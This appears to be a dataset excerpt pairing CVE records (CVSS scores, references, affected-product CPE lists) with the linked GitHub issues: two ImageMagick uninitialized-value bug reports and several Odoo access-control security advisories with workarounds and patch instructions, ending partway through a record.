"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": null,
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "http://www.securityfocus.com/bid/108913"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1519"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": null,
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*",
"matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1519 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [ Y ] I have written a descriptive issue title
- [ Y ] I have verified that I am using the latest version of ImageMagick
- [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There a use-of-uninitialized-value vulnerability in function ReadPANGOImage in coders/pango.c.
```
assert(image_info != (const ImageInfo *) NULL);
assert(image_info->signature == MagickCoreSignature);
if (image_info->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",
image_info->filename);
assert(exception != (ExceptionInfo *) NULL);
assert(exception->signature == MagickCoreSignature);
image=AcquireImage(image_info,exception);
(void) ResetImagePage(image,"0x0+0+0");
```
https://github.com/ImageMagick/ImageMagick/blob/master/coders/pango.c#L179
We should call `SetImageBackgroundColor` when condition `image->columns !=0 && image->rows !=0` satisfies. Otherwise, there will be a use-of-unintialized-value vulnerablity.
See https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=11930, https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=6616, https://github.com/ImageMagick/ImageMagick/commit/18df5773b5efbd2c9dc54c9caa021febf486bd22 and https://github.com/ImageMagick/ImageMagick/commit/f1fb7816a60c7c68d7ac037975c5aa95b6dcf8dd for more details. | Use-of-uninitialized-value in function ReadPANGOImage | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1519/comments | 2 | 2019-03-21T06:54:58Z | 2019-06-27T01:30:41Z | https://github.com/ImageMagick/ImageMagick/issues/1519 | 423,592,141 | 1,519 |
CVE-2019-12979 | 2019-06-26T18:15:10.417 | ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "http://www.securityfocus.com/bid/108913"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1522"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*",
"matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
"matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1522 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [ Y ] I have written a descriptive issue title
- [ Y ] I have verified that I am using the latest version of ImageMagick
- [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There is an issue in function SyncImageSettings in MagickCore/image.c. The issue is similar to https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=6385 which was fixed in https://github.com/ImageMagick/ImageMagick/commit/56a19e7ae07f40299f3afd4994d690f2c9b81993.
```
if (image_info->density != (char *) NULL)
{
GeometryInfo
geometry_info;
flags=ParseGeometry(image_info->density,&geometry_info);
image->resolution.x=geometry_info.rho;
image->resolution.y=geometry_info.sigma;
if ((flags & SigmaValue) == 0)
image->resolution.y=image->resolution.x;
}
```
Below is the proposal patch.
```
- image->resolution.x=geometry_info.rho;
- image->resolution.y=geometry_info.sigma;
- if ((flags & SigmaValue) == 0)
- image->resolution.y=image->resolution.x;
+ if ((flags & RhoValue) != 0)
+ image->resolution.x=geometry_info.rho;
+ image->resolution.y=image->resolution.x;
+ if ((flags & SigmaValue) != 0)
+ image->resolution.y=geometry_info.sigma;
```
| Use-of-uninitialized-value in function SyncImageSettings. | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1522/comments | 5 | 2019-03-21T11:58:29Z | 2019-08-10T06:30:27Z | https://github.com/ImageMagick/ImageMagick/issues/1522 | 423,694,012 | 1,522 |
CVE-2018-14867 | 2019-06-28T18:15:10.410 | Incorrect access control in the portal messaging system in Odoo Community 9.0 and 10.0 and Odoo Enterprise 9.0 and 10.0 allows remote attackers to post messages on behalf of customers, and to guess document attribute values, via crafted parameters. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/commits/master"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32503"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/32503 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - ODOO-SA-2018-08-07-3
Incorrect access control in the portal messaging system in Odoo Community 9.0 and 10.0 and Odoo Enterprise 9.0 and 10.0 allows remote attackers to post messages on behalf of customers, and to guess document attribute values, via crafted parameters.
**Affects**: Odoo 9.0, 10.0 (Community and Enterprise Editions)
**Component**: website_mail
**Credits**: Nils Hamerlinck (Trobz), Naglis Jonaitis, Andrew Grasso
**CVE ID**: [CVE-2018-14867](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14867)
## I. Background
Odoo's messaging engine allows visitors on the website to post messages on
existing documents. That mechanism is used to chat with unauthenticated users or
to allow portal users to comment on their documents such as orders or tickets.
This feature is limited by a security check that only allow users to post on
documents when they have received a direct secure link to the document.
## II. Problem Description
A programming error in the security check of the message post feature makes it
easy to circumvent. It can also turn it into a vector for leaking limited
information about arbitrary documents.
## III. Impact
**Attack Vector**: Network exploitable
**Authentication**: No user account required
**CVSS3 Score**: Medium :: 6.5
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)
A remote unauthenticated attacker could craft a request in order to post messages
on any document of the database which includes a message history,
as if they had been posted by the customer linked to the document.
This attack also allows the attacker to guess, by trial and error, the value of
a limited number of fields on such document. This is mitigated by the fact that
it is very time consuming and will cause messages to be posted on the document.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
No workaround is available, applying the patch is strongly recommended.
Uninstalling the "website_mail" module can prevent exploiting this
vulnerability, at the expense of making some parts of the Odoo deployment
stop working (depending on the version and other modules installed).
Odoo Online servers have been patched as soon as the correction was
available.
## V. Solution
Apply the patches corresponding to your Odoo installation, or update to
the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
For the actual update procedure, please refer to our update instructions, valid
for all versions:
https://www.odoo.com/documentation/11.0/setup/update.html
If you choose to apply the patch instead, change into the main directory of
your Odoo installation (the one containing "odoo" and "addons" directories),
then execute the patch command, typically:
patch -p0 -f < /path/to/the_patch_file.patch
This command assumes your installation layout corresponds to
the latest source code layout of the Odoo project on GitHub.
If your installation differs, please extract the various patch
hunks from the files and apply them in the appropriate locations.
## VI. Correction details
The following list contains the revisions after which the vulnerability
is corrected:
- 9.0: 6033439c67d696f5accb7e17ac42de6f9c0bd0b3
- 10.0: e00370e194ffa0c527bb4669401949cc6a15f55f
- 10.0-ent and 9.0-ent (Enterprise): see 10.0 and 9.0.
The version 11.0 is not impacted by this vulnerability.
| [SEC] ODOO-SA-2018-08-07-3 (CVE-2018-14867) - Incorrect access control in the... | https://api.github.com/repos/odoo/odoo/issues/32503/comments | 0 | 2019-04-08T13:37:31Z | 2019-04-08T13:37:33Z | https://github.com/odoo/odoo/issues/32503 | 430,456,556 | 32,503 |
CVE-2018-14868 | 2019-06-28T18:15:10.473 | Incorrect access control in the Password Encryption module in Odoo Community 9.0 and Odoo Enterprise 9.0 allows authenticated users to change the password of other users without knowing their current password via a crafted RPC call. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/commits/master"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32507"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/32507 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - ODOO-SA-2018-08-07-7
Incorrect access control in the Password Encryption module in Odoo Community 9.0 and Odoo Enterprise 9.0 allows authenticated users to change the password of other users without knowing their current password via a crafted RPC call.
**Affects**: Odoo 9.0 (Community and Enterprise Editions)
**Component**: auth_crypt module
**Credits**: Nils Hamerlinck (Trobz)
**CVE ID**: [CVE-2018-14868](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14868)
## I. Background
As of Odoo 8.0, when local passwords are used, the passwords are stored
by default as salted cryptographic hashes (derived via PBKDF2 using
SHA-512 hashing). This is provided by the "Password Encryption" module
(auth_crypt), which is automatically installed.
## II. Problem Description
Improper access control in the auth_crypt module allows authenticated
users to change user passwords without any control.
## III. Impact
Access Vector: Network exploitable
Access Complexity: Low
**Authentication**: User account required
**CVSS3 Score**: High :: 8.1
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)
By crafting a malicious RPC request, remote authenticated attackers
(including portal users) could force a chosen password on any user, without
knowing their current password.
Odoo S.A. is not aware of any malicious use of this vulnerability.
## IV. Workaround
There is no known workaround, other than restricting remote access to the system
to trustworthy network addresses only. Uninstalling the "Password Encryption"
module (auth_crypt) would work too, with the side-effect of denying access to all
users currently authenticated with hashed passwords.
Odoo Online servers have been patched as soon as the correction was
available.
## V. Solution
Apply the patches corresponding to your Odoo installation, or update to
the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
For the actual update procedure, please refer to our update instructions, valid
for all versions:
https://www.odoo.com/documentation/11.0/setup/update.html
If you choose to apply the patch instead, change into the main directory of
your Odoo installation (the one containing "odoo" and "addons" directories),
then execute the patch command, typically:
patch -p0 -f < /path/to/the_patch_file.patch
This command assumes your installation layout corresponds to
the latest source code layout of the Odoo project on GitHub.
If your installation differs, please extract the various patch
hunks from the files and apply them in the appropriate locations.
## VI. Correction details
The following list contains the revisions after which the vulnerability
is corrected:
- 9.0: e9624a846048188e5282f65926f98dc297467245
- 9.0-ent (Enterprise): see 9.0.
Versions 10.0 and later are not impacted by this vulnerability.
| [SEC] ODOO-SA-2018-08-07-7 (CVE-2018-14868) - Incorrect access control in the... | https://api.github.com/repos/odoo/odoo/issues/32507/comments | 0 | 2019-04-08T13:37:42Z | 2019-04-08T13:37:43Z | https://github.com/odoo/odoo/issues/32507 | 430,456,652 | 32,507 |
CVE-2018-14885 | 2019-06-28T18:15:10.520 | Incorrect access control in the database manager component in Odoo Community 10.0 and 11.0 and Odoo Enterprise 10.0 and 11.0 allows a remote attacker to restore a database dump without knowing the super-admin password. An arbitrary password succeeds. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/commits/master"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32512"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:community:*:*:*",
"matchCriteriaId": "38424B03-4121-4A79-8E4E-4CB4DCD3E4A5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "1298CF62-A06E-48AD-8141-0541DE3F6381",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/32512 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - ODOO-SA-2018-08-07-12
Incorrect access control in the database manager component in Odoo Community 10.0 and 11.0 and Odoo Enterprise 10.0 and 11.0 allows a remote attacker to restore a database dump without knowing the super-admin password. An arbitrary password succeeds.
**Affects**: Odoo 10.0, 11.0 (Community and Enterprise Editions)
**Component**: Database Manager
**Credits**: Yenthe Van Ginneken and Erwin van der Ploeg (Odoo Experts)
**CVE ID**: [CVE-2018-14885](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14885)
## I. Background
Odoo provides an interface to manage databases, and create, backup and restore
databases, in order to ease testing and development tasks.
Access to these sensitive operations is normally protected by a super-admin
password, chosen by the system administrator.
## II. Problem Description
A programming error in the database restore feature rendered the super-admin
password protection ineffective.
## III. Impact
Access Vector: Network exploitable
Access Complexity: Low
**Authentication**: Public
**CVSS3 Score**: High :: 8.2
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)
When the database manager screen is not deactivated, an attacker could restore
a database backup without knowning the super-admin password. This would allow
the injection of data, and the execution of requests on the server with
local database administration privileges.
On a properly configured server, this could degrade the performance
of the targeted server without gaining any access on the other databases
on the server.
Odoo S.A. is not aware of any malicious use of this vulnerability.
## IV. Workaround
Only servers with the database manager enabled are vulnerable to this issue.
On production servers, deactivating the database manager will prevent attackers
from abusing the issue, and is strongly recommended.
See also the Odoo Deployment Guide:
https://www.odoo.com/documentation/11.0/setup/deploy.html
Revoking database creation rights for the PostgreSQL user configured for the
Odoo service will also prevent the attack.
Odoo Cloud servers are not vulnerable to this issue, because the database
manager is not enabled.
## V. Solution
Apply the patches corresponding to your Odoo installation, or update to
the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
For the actual update procedure, please refer to our update instructions, valid
for all versions:
https://www.odoo.com/documentation/11.0/setup/update.html
If you choose to apply the patch instead, change into the main directory of
your Odoo installation (the one containing "odoo" and "addons" directories),
then execute the patch command, typically:
patch -p0 -f < /path/to/the_patch_file.patch
This command assumes your installation layout corresponds to
the latest source code layout of the Odoo project on GitHub.
If your installation differs, please extract the various patch
hunks from the files and apply them in the appropriate locations.
## VI. Correction details
The following list contains the revisions after which the vulnerability
is corrected:
- 10.0: b0203084133bee0dadc004debf3b0fb2835d0ffd
- 11.0: 5decf4ab3da7484f8418d648688fbe4250ea7fdd
- 11.0-ent and 10.0-ent (Enterprise): see 11.0 and 10.0.
The version 9.0 is not impacted by this vulnerability.
| [SEC] ODOO-SA-2018-08-07-12 (CVE-2018-14885) - Incorrect access control in the... | https://api.github.com/repos/odoo/odoo/issues/32512/comments | 0 | 2019-04-08T13:37:55Z | 2019-04-08T13:37:57Z | https://github.com/odoo/odoo/issues/32512 | 430,456,776 | 32,512 |
CVE-2018-14886 | 2019-06-28T18:15:10.567 | The module-description renderer in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier does not disable RST's local file inclusion, which allows privileged authenticated users to read local files via a crafted module description. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
"exploitabilityScore": 1.2,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/commits/master"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32513"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*",
